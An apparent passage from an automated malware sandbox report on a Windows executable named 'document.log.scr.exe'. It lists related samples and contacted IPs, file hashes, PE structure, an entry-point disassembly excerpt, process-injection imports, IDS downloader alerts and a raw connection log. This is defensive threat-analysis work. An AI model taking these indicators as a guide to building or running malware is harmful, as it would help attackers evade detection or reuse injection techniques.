                                                                file.msg.scr.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.157.27
                                                                Fb4J788TwD.exeGet hashmaliciousMiMailBrowse
                                                                • 173.194.202.26
                                                                ydbWyoxHsd.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.157.26
                                                                Readme.exeGet hashmaliciousUnknownBrowse
                                                                • 74.125.200.26
                                                                file.log.exeGet hashmaliciousUnknownBrowse
                                                                • 173.194.202.26
                                                                data.log.exeGet hashmaliciousUnknownBrowse
                                                                • 173.194.202.27
                                                                message.elm.exeGet hashmaliciousUnknownBrowse
                                                                • 173.194.202.27
                                                                mta7.am0.yahoodns.netOPgjjiInNK.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.76
                                                                2FnvReiPU6.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.91
                                                                874A7cigvX.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.74
                                                                RSno9EH0K9.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.111
                                                                Uc84uB877e.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.109
                                                                bEsOrli29K.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.77
                                                                Eduhazqw4u.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.109
                                                                setup.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.76
                                                                m4Jp2TLBHJ.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.77
                                                                SecuriteInfo.com.Trojan-Ransom.StopCrypt.22110.437.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.74
                                                                gmail-smtp-in.l.google.comyGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                • 142.251.168.27
                                                                4ui8luUSNp.exeGet hashmaliciousCoinhive, XmrigBrowse
                                                                • 74.125.200.26
                                                                .exeGet hashmaliciousUnknownBrowse
                                                                • 142.251.173.26
                                                                a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
                                                                • 173.194.219.26
                                                                sorteado!!.com.exeGet hashmaliciousUnknownBrowse
                                                                • 74.125.138.26
                                                                file.exeGet hashmaliciousPhorpiexBrowse
                                                                • 142.250.113.27
                                                                webcam.txt.com.exeGet hashmaliciousUnknownBrowse
                                                                • 172.253.115.27
                                                                G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                                                                • 142.251.111.27
                                                                EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                                                                • 74.125.137.27
                                                                OWd39WUX3D.exeGet hashmaliciousPushdoBrowse
                                                                • 172.253.63.27
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                FUNETASFIj3Lr4Fk7Kb.elfGet hashmaliciousMiraiBrowse
                                                                • 86.50.36.169
                                                                nabarm.elfGet hashmaliciousUnknownBrowse
                                                                • 130.232.111.233
                                                                splarm.elfGet hashmaliciousUnknownBrowse
                                                                • 192.98.38.193
                                                                mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 157.24.20.223
                                                                nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                • 193.166.100.123
                                                                jklppc.elfGet hashmaliciousUnknownBrowse
                                                                • 128.214.222.213
                                                                la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                • 130.232.65.208
                                                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                • 161.41.22.255
                                                                yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                • 193.166.255.171
                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                • 161.41.157.202
                                                                YAHOO-NE1USla.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                • 98.137.87.77
                                                                mirai.mips.elfGet hashmaliciousMiraiBrowse
                                                                • 98.138.234.211
                                                                Crt09EgZK3.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.75
                                                                Farahexperiences.com_Report_52288.pdfGet hashmaliciousUnknownBrowse
                                                                • 74.6.231.21
                                                                z3hir.arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 216.252.107.80
                                                                Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                • 74.6.231.21
                                                                OPgjjiInNK.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.76
                                                                rXTqHar5Ud.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.74
                                                                Tsunami.arm.elfGet hashmaliciousMiraiBrowse
                                                                • 98.137.87.86
                                                                2FnvReiPU6.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.91
                                                                YAHOO-GQ1USmips.elfGet hashmaliciousUnknownBrowse
                                                                • 98.137.238.195
                                                                2RXgLC0ir2.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 98.137.12.116
                                                                Q137zuCNxh.elfGet hashmaliciousMiraiBrowse
                                                                • 74.6.200.172
                                                                uMlLpvdLRU.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.109
                                                                6foBmRMlDy.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.106
                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                • 98.137.186.231
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 98.139.117.51
                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                • 98.137.77.120
                                                                Remittance_Regulvar.htmGet hashmaliciousUnknownBrowse
                                                                • 74.6.160.106
                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                • 98.137.11.164
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\Desktop\document.log.scr.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):88577
                                                                Entropy (8bit):6.642961349064588
                                                                Encrypted:false
                                                                SSDEEP:1536:AUQXuu3bm+zpKAfC/RIUYTjjeldZuZy3N7j5yVvrnxBwaBRnK0Ya4nq38n53AhdI:BQ+Spzp9aRej6ldQaHUFrnxe4k02XATI
                                                                MD5:409E8228898074DF3359B7BFAEEAF8F2
                                                                SHA1:8FC29528A259BECBB50EB09B15860D28D0D68A8F
                                                                SHA-256:E556363134A45CD99DD7F58CBBFA6DEC723205F8C5BFBFEC41A68D70F05F29AA
                                                                SHA-512:BC3E9A68B3850BB813B5CB3AC517D9AE0D3729B43B74178E0F43BA9EADB98320EE698049AC2C6E561B6ADC55A7FBE436169868FD6CE6B30871518BD4DC00F703
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:^iIh[a*uiL-c.'aJ0.xF%G\!.8QDX<.ez&C_()IOH3K-2]ypZel!8,.T%._WetgLdK8POZV0IO'XsB9nmhIZI<:}edxSqPow<.qzV{6agl6C2E61yIm!Z@>2q}-!;rFZCIv!6lNR=${ E:C.Un.7'i)f:+n+&,Qf_P\9qy/9g:C[6b*rPPE.S(.8\ajYBBV"Q5Kl|@U(*A&g].'Ya V=.JV4Q9TIud=#+W|Lsa;hu+zqA8Ilj^|.\p+Y.U'094+XeGIEsT~CI]#q".#2j ^!:7KxBh7Nxz]//H5KCRXXW1e'3CcB+n7@<[Nw{s.kP8.b8L)<(*%Ui{u9X|`E!Uyc0X?Hq_Rd4RJAK]IZ3Mr^~.of-0wlCV~aQC#NI%.eP.rKfYv@/..glLPa6i>u}">6...L0gSpN1%rX=~qu~}+*uJ>F.u?=0J1<dN"V9=gl|hb.Uv@COwBIQz!@'Y}9{>x[G9Ih,3&21UJVRN&I.22U2cw^e_H~GjC.WiATo.DQvrIX1&NSIt,X}~S:0z~C&^aX.+C$rQFgoqN $Q5`:+bY7xJ{,mWmkly{+i1(\_mL>LOh(c ;_AN3mfT.c*4?m5T9XHX`O-<6>@.~BIy?Zmk=sB2LsyEKc_v jL^u2F[4z8$zvQ.^GvuF.\BscG8z6?sI;?!.3soLslum'yd]Lk+1'Yd.?6GMy[`u;Pw.A5HfiRLT`'d7yQ9*G/uQ"'_"`w,9$wu$Y}N'f}&t7C\b{XLf<n0K;xHj&Y3sBj,HWSCu_'pb.1mSFe]]tw\8hRZ9Mub+gr@~Qv-cr%"uh(s:6RSzl8JD~:'fGrNhCBX,^s1Odq`\bCx4!~5B9=NvPq9/`VE;/}N1&j.s<iKRW2.`'.@{OB-!tqZ][mq@~lb.U+88ec^['.@cB;P11X@z24^hlv?Xlb->+~F.|>?2%zQf89vq,O@X.DKCL6D/qOl)Wef.7.`8q\4+.?p<.u{l~&tYUX|sN,ZI*13A"P.&n.n@CZq
                                                                Process:C:\Users\user\Desktop\document.log.scr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):423046
                                                                Entropy (8bit):4.098108107355895
                                                                Encrypted:false
                                                                SSDEEP:3072:DFZ5qVGXvEQU+dXmEUy9rfe3kUdKSh7hKNjf7CwhqjEr8IcGN8yGBYPosqkxOqoS:JjqVG/pJZzfwsGX+LOOD3Os
                                                                MD5:203E91D369913B5768296E416B0C86D5
                                                                SHA1:91FF86480474CBC5B49644700674440F8691B59F
                                                                SHA-256:99145DA1ACE397A51D6ED5BD96E1C0167554E6E4028F58A20DDC091DED0FAFBE
                                                                SHA-512:D1FEF688FCB78C44B514D0A02505CF6F5F9A591FBBE55946F18C7A3AE979FA126B102D229BC50FB4BA7143516D4EA59CC32662FF545718156BDFEE2D9219F3B7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 95%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............fr..fr..fr..n...fr..j}..fr..n/..fr.jn/..fr..fs.wfr..j-.fr..j...fr..m,..fr..j(..fr.Rich.fr.................PE..L... ?.E.....................p.......]............@..........................P..................................................P....@..................................................................H...............L............................text............................... ..`.rdata...........0..................@..@.data....(..........................@....rsrc........@....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\document.log.scr.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):4.098108107355895
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:document.log.scr.exe
                                                                File size:423'046 bytes
                                                                MD5:203e91d369913b5768296e416b0c86d5
                                                                SHA1:91ff86480474cbc5b49644700674440f8691b59f
                                                                SHA256:99145da1ace397a51d6ed5bd96e1c0167554e6e4028f58a20ddc091ded0fafbe
                                                                SHA512:d1fef688fcb78c44b514d0a02505cf6f5f9a591fbbe55946f18c7a3ae979fa126b102d229bc50fb4ba7143516d4ea59cc32662ff545718156bdfee2d9219f3b7
                                                                SSDEEP:3072:DFZ5qVGXvEQU+dXmEUy9rfe3kUdKSh7hKNjf7CwhqjEr8IcGN8yGBYPosqkxOqoS:JjqVG/pJZzfwsGX+LOOD3Os
                                                                TLSH:CB948D61F28DC1B1E44A1DB5B8AC936662B27D28173CABF3BB507F09A5732D07C31916
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............fr..fr..fr..n...fr..j}..fr..n/..fr.jn/..fr..fs.wfr..j-..fr..j...fr..m,..fr..j(..fr.Rich.fr.................PE..L... ?.E...
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x425d91
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:
                                                                Time Stamp:0x45113F20 [Wed Sep 20 13:16:16 2006 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:547cd05356c429dc57b17bf0fd6daf12
                                                                Instruction
                                                                push 00000060h
                                                                push 0042E598h
                                                                call 00007F22E4B59AE4h
                                                                mov edi, 00000094h
                                                                mov eax, edi
                                                                call 00007F22E4B5893Ch
                                                                mov dword ptr [ebp-18h], esp
                                                                mov esi, esp
                                                                mov dword ptr [esi], edi
                                                                push esi
                                                                call dword ptr [0042E0ECh]
                                                                mov ecx, dword ptr [esi+10h]
                                                                mov dword ptr [00432214h], ecx
                                                                mov eax, dword ptr [esi+04h]
                                                                mov dword ptr [00432220h], eax
                                                                mov edx, dword ptr [esi+08h]
                                                                mov dword ptr [00432224h], edx
                                                                mov esi, dword ptr [esi+0Ch]
                                                                and esi, 00007FFFh
                                                                mov dword ptr [00432218h], esi
                                                                cmp ecx, 02h
                                                                je 00007F22E4B5923Eh
                                                                or esi, 00008000h
                                                                mov dword ptr [00432218h], esi
                                                                shl eax, 08h
                                                                add eax, edx
                                                                mov dword ptr [0043221Ch], eax
                                                                xor esi, esi
                                                                push esi
                                                                mov edi, dword ptr [0042E0BCh]
                                                                call edi
                                                                cmp word ptr [eax], 5A4Dh
                                                                jne 00007F22E4B59251h
                                                                mov ecx, dword ptr [eax+3Ch]
                                                                add ecx, eax
                                                                cmp dword ptr [ecx], 00004550h
                                                                jne 00007F22E4B59244h
                                                                movzx eax, word ptr [ecx+18h]
                                                                cmp eax, 0000010Bh
                                                                je 00007F22E4B59251h
                                                                cmp eax, 0000020Bh
                                                                je 00007F22E4B59237h
                                                                mov dword ptr [ebp-1Ch], esi
                                                                jmp 00007F22E4B59259h
                                                                cmp dword ptr [ecx+00000084h], 0Eh
                                                                jbe 00007F22E4B59224h
                                                                xor eax, eax
                                                                cmp dword ptr [ecx+000000F8h], esi
                                                                jmp 00007F22E4B59240h
                                                                cmp dword ptr [ecx+74h], 0Eh
                                                                jbe 00007F22E4B59214h
                                                                xor eax, eax
                                                                cmp dword ptr [ecx+000000E8h], esi
                                                                setne al
                                                                mov dword ptr [ebp-1Ch], eax
                                                                Programming Language:
                                                                • [ASM] VS2003 (.NET) build 3077
                                                                • [ C ] VS2003 (.NET) build 3077
                                                                • [C++] VS2003 (.NET) build 3077
                                                                • [RES] VS2003 (.NET) build 3077
                                                                • [LNK] VS2003 (.NET) build 3077
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x302040x50.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x30118.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f6d00x48.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2e0000x24c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x2c5a40x2d000d7d3452993b82ee75052e80e49c890e4False0.5532931857638889data6.353296576388688IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x2e0000x2efc0x300048995658de018e8713b6cf36f411ca2eFalse0.3614908854166667data4.955424298416429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x310000x28c00x1000cac477c02821e1eee50e0d1240a07368False0.211669921875Matlab v4 mat-file (little endian) , numeric, rows 4351131, columns 43800161.9793888897922702IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x340000x301180x310004e7d528ce916727be35809bf9797978bFalse0.05013851243622449data0.5968541437656842IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                0x615180x2c00dataEnglishUnited States0.10884232954545454
                                                                0x39f180xf000dataEnglishUnited States0.022721354166666666
                                                                RT_ICON0x343200x2e8ISO-8859 text, with very long lines (744), with no line terminatorsEnglishUnited States0.020161290322580645
                                                                RT_ICON0x346080xffffff28dataEnglishUnited States0.04951295440851577
                                                                DLLImport
                                                                KERNEL32.dllWriteProcessMemory, VirtualAllocEx, lstrlenA, OpenProcess, Process32Next, Process32First, CreateToolhelp32Snapshot, GetFileAttributesA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, UnmapViewOfFile, GetFileSize, MapViewOfFile, CreateFileMappingA, FindClose, FindNextFileA, lstrcmpA, GetLastError, FindFirstFileA, lstrcpyA, SetFilePointer, ReadFile, GetTimeZoneInformation, GetModuleHandleA, LoadLibraryA, GetModuleFileNameA, GetCurrentDirectoryA, MoveFileExA, CopyFileA, GetOverlappedResult, LockResource, SizeofResource, LoadResource, FindResourceA, ResetEvent, GetVersionExA, HeapReAlloc, IsBadWritePtr, GetVolumeInformationA, DeviceIoControl, DefineDosDeviceA, QueryDosDeviceA, SetEndOfFile, GetProcAddress, CreateRemoteThread, GetCurrentProcess, CreateMutexA, ReleaseMutex, GetProcessHeap, HeapAlloc, Sleep, CloseHandle, GetTempPathA, GetTempFileNameA, WriteFile, CreateProcessA, DeleteFileA, HeapFree, GetLocalTime, CreateThread, CreateEventA, WaitForMultipleObjects, SetEvent, WaitForSingleObject, ExpandEnvironmentStringsA, CreateFileA, GetTickCount, ExitProcess, RtlUnwind, RaiseException, GetStartupInfoA, GetCommandLineA, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, TlsAlloc, SetLastError, TlsFree, TlsSetValue, TlsGetValue, SetUnhandledExceptionFilter, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InterlockedExchange, VirtualQuery, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, TerminateProcess, HeapSize, VirtualProtect, GetSystemInfo, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, IsBadReadPtr, IsBadCodePtr, GetACP, GetOEMCP, GetCPInfo, InitializeCriticalSection, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, FlushFileBuffers
                                                                USER32.dllwsprintfA, MessageBoxA, SetWindowsHookExA
                                                                ADVAPI32.dllRegOpenKeyA, RegEnumKeyExA, InitializeSecurityDescriptor, GetTokenInformation, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, AllocateAndInitializeSid, GetLengthSid, AddAce, IsValidSecurityDescriptor, QueryServiceStatusEx, OpenSCManagerA, OpenServiceA, CloseServiceHandle, RegDeleteValueA, RegSetValueExA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-31T15:26:15.935513+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450037193.166.255.17180TCP
                                                                2024-10-31T15:26:15.935513+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450037193.166.255.17180TCP
                                                                2024-10-31T15:26:15.935513+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450036193.166.255.17180TCP
                                                                2024-10-31T15:26:15.935513+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450036193.166.255.17180TCP
                                                                2024-10-31T15:26:28.058727+01002016998ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)1192.168.2.449731193.166.255.17180TCP
                                                                2024-10-31T15:26:28.951208+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449731193.166.255.17180TCP
                                                                2024-10-31T15:26:28.951208+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449731193.166.255.17180TCP
                                                                2024-10-31T15:26:31.150846+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449732TCP
                                                                2024-10-31T15:26:37.558372+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449733193.166.255.17180TCP
                                                                2024-10-31T15:26:37.558372+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449733193.166.255.17180TCP
                                                                2024-10-31T15:26:46.221781+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449739193.166.255.17180TCP
                                                                2024-10-31T15:26:46.221781+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449739193.166.255.17180TCP
                                                                2024-10-31T15:26:54.839417+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742193.166.255.17180TCP
                                                                2024-10-31T15:26:54.839417+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449742193.166.255.17180TCP
                                                                2024-10-31T15:26:54.851261+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449741193.166.255.17180TCP
                                                                2024-10-31T15:26:54.851261+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449741193.166.255.17180TCP
                                                                2024-10-31T15:27:03.434045+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449744193.166.255.17180TCP
                                                                2024-10-31T15:27:03.434045+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449744193.166.255.17180TCP
                                                                2024-10-31T15:27:03.467045+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449745193.166.255.17180TCP
                                                                2024-10-31T15:27:03.467045+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449745193.166.255.17180TCP
                                                                2024-10-31T15:27:10.072282+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449750TCP
                                                                2024-10-31T15:27:12.073717+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746193.166.255.17180TCP
                                                                2024-10-31T15:27:12.073717+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449746193.166.255.17180TCP
                                                                2024-10-31T15:27:12.094487+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449747193.166.255.17180TCP
                                                                2024-10-31T15:27:12.094487+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449747193.166.255.17180TCP
                                                                2024-10-31T15:27:20.771757+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449763193.166.255.17180TCP
                                                                2024-10-31T15:27:20.771757+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449763193.166.255.17180TCP
                                                                2024-10-31T15:27:20.771888+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449762193.166.255.17180TCP
                                                                2024-10-31T15:27:20.771888+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449762193.166.255.17180TCP
                                                                2024-10-31T15:27:29.358961+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449807193.166.255.17180TCP
                                                                2024-10-31T15:27:29.358961+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449807193.166.255.17180TCP
                                                                2024-10-31T15:27:29.372531+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449808193.166.255.17180TCP
                                                                2024-10-31T15:27:29.372531+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449808193.166.255.17180TCP
                                                                2024-10-31T15:27:37.966563+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449849193.166.255.17180TCP
                                                                2024-10-31T15:27:37.966563+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449849193.166.255.17180TCP
                                                                2024-10-31T15:27:37.973451+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449850193.166.255.17180TCP
                                                                2024-10-31T15:27:37.973451+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449850193.166.255.17180TCP
                                                                2024-10-31T15:27:47.095297+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449896193.166.255.17180TCP
                                                                2024-10-31T15:27:47.095297+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449896193.166.255.17180TCP
                                                                2024-10-31T15:27:47.095324+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449894193.166.255.17180TCP
                                                                2024-10-31T15:27:47.095324+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449894193.166.255.17180TCP
                                                                2024-10-31T15:27:55.713359+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449937193.166.255.17180TCP
                                                                2024-10-31T15:27:55.713359+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449937193.166.255.17180TCP
                                                                2024-10-31T15:27:55.714932+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449936193.166.255.17180TCP
                                                                2024-10-31T15:27:55.714932+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449936193.166.255.17180TCP
                                                                2024-10-31T15:28:04.318931+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449982193.166.255.17180TCP
                                                                2024-10-31T15:28:04.318931+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449982193.166.255.17180TCP
                                                                2024-10-31T15:28:04.322584+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449981193.166.255.17180TCP
                                                                2024-10-31T15:28:04.322584+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449981193.166.255.17180TCP
                                                                2024-10-31T15:28:12.965052+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450027193.166.255.17180TCP
                                                                2024-10-31T15:28:12.965052+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450027193.166.255.17180TCP
                                                                2024-10-31T15:28:12.976431+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450028193.166.255.17180TCP
                                                                2024-10-31T15:28:12.976431+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450028193.166.255.17180TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 31, 2024 15:26:27.690565109 CET4973025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:28.058727026 CET4973180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:28.063843012 CET8049731193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:28.063925028 CET4973180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:28.065036058 CET4973180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:28.069833040 CET8049731193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:28.685436010 CET4973025192.168.2.498.136.96.75
                                                                Oct 31, 2024 15:26:28.951138973 CET8049731193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:28.951208115 CET4973180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:28.952322006 CET4973180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:28.957724094 CET8049731193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:29.071204901 CET4973380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:29.076534033 CET8049733193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:26:29.076597929 CET4973380192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:26:29.076679945 CET4973380192.168.2.4193.166.255.171
